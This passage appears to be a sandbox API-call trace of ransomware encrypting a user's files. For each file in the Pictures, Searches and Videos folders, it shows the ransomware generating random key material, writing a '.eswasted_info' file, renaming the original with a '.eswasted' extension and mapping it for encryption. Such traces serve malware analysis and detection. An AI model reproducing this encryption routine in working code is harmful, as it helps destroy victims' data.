RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.280] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.281] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.281] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PJQGu6K.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjqgu6k.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.282] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.283] SetEndOfFile (hFile=0x108) returned 1 [0080.283] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.283] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.283] lstrcpyW (in: lpString1=0x6f5d2c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PJQGu6K.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjqgu6k.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PJQGu6K.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjqgu6k.bmp.eswasted")) returned 1 [0080.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PJQGu6K.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjqgu6k.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.284] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.286] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.287] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.287] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.287] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.287] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.287] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.296] SetEndOfFile (hFile=0x108) returned 1 [0080.332] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.332] CloseHandle (hObject=0x108) returned 1 [0080.334] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.334] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.334] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.335] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y3n0o.bmp") returned 52 [0080.335] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x6f5cc0 [0080.335] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.335] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.335] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.335] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.335] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y3n0o.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y3n0o.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.336] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.337] SetEndOfFile (hFile=0x108) returned 1 [0080.337] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.337] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.337] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.337] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y3n0o.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y3n0o.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y3n0o.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y3n0o.bmp.eswasted")) returned 1 [0080.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\y3n0o.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y3n0o.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.338] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.339] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.339] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.339] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.339] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.340] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.340] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.349] SetEndOfFile (hFile=0x108) returned 1 [0080.351] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.351] CloseHandle (hObject=0x108) returned 1 [0080.353] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.353] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.353] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.353] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.353] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0080.353] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x6f5cc0 [0080.354] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.354] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.354] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.354] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.354] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.355] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.356] SetEndOfFile (hFile=0x108) returned 1 [0080.356] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.356] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.356] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted")) returned 1 [0080.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0080.360] GetLastError () returned 0x5 [0080.360] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted")) returned 0x23 [0080.361] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0080.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.361] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.361] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0080.362] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0080.362] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.363] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.363] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.363] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.364] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.364] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.412] SetEndOfFile (hFile=0x108) returned 1 [0080.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.415] CloseHandle (hObject=0x108) returned 1 [0080.419] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.419] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.421] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.421] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.421] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\batsLYyy.flv") returned 53 [0080.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x274) returned 0x6f5cc0 [0080.421] lstrcpyW (in: lpString1=0x6f5d2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.421] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.421] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.422] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.422] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\batsLYyy.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\batslyyy.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.423] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.424] SetEndOfFile (hFile=0x108) returned 1 [0080.424] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.424] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.424] lstrcpyW (in: lpString1=0x6f5d2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\batsLYyy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\batslyyy.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\batsLYyy.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\batslyyy.flv.eswasted")) returned 1 [0080.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\batsLYyy.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\batslyyy.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.426] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.428] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.429] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.429] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.429] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.430] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.430] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.438] SetEndOfFile (hFile=0x108) returned 1 [0080.440] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.440] CloseHandle (hObject=0x108) returned 1 [0080.442] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.442] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.443] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.443] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.443] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\GkGBpUQbbi.flv") returned 76 [0080.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x6f5cc0 [0080.443] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.443] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.443] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.444] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.444] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\GkGBpUQbbi.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\gkgbpuqbbi.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.444] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.445] SetEndOfFile (hFile=0x108) returned 1 [0080.446] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.446] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.446] lstrcpyW (in: lpString1=0x6f5d58, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\GkGBpUQbbi.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\gkgbpuqbbi.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\GkGBpUQbbi.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\gkgbpuqbbi.flv.eswasted")) returned 1 [0080.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\GkGBpUQbbi.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\gkgbpuqbbi.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.447] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0080.449] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.449] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.450] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.450] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.450] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.450] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.500] SetEndOfFile (hFile=0x108) returned 1 [0080.502] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.502] CloseHandle (hObject=0x108) returned 1 [0080.512] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.512] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.513] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.513] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\07gMa.flv") returned 88 [0080.513] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ba) returned 0x6f5cc0 [0080.513] lstrcpyW (in: lpString1=0x6f5d70, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.513] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0080.513] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.514] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0080.514] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\07gMa.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\07gma.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.514] WriteFile (in: hFile=0x108, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.516] SetEndOfFile (hFile=0x108) returned 1 [0080.516] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.516] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.516] lstrcpyW (in: lpString1=0x6f5d70, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\07gMa.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\07gma.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\07gMa.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\07gma.flv.eswasted")) returned 1 [0080.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\07gMa.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\07gma.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.517] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.519] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: 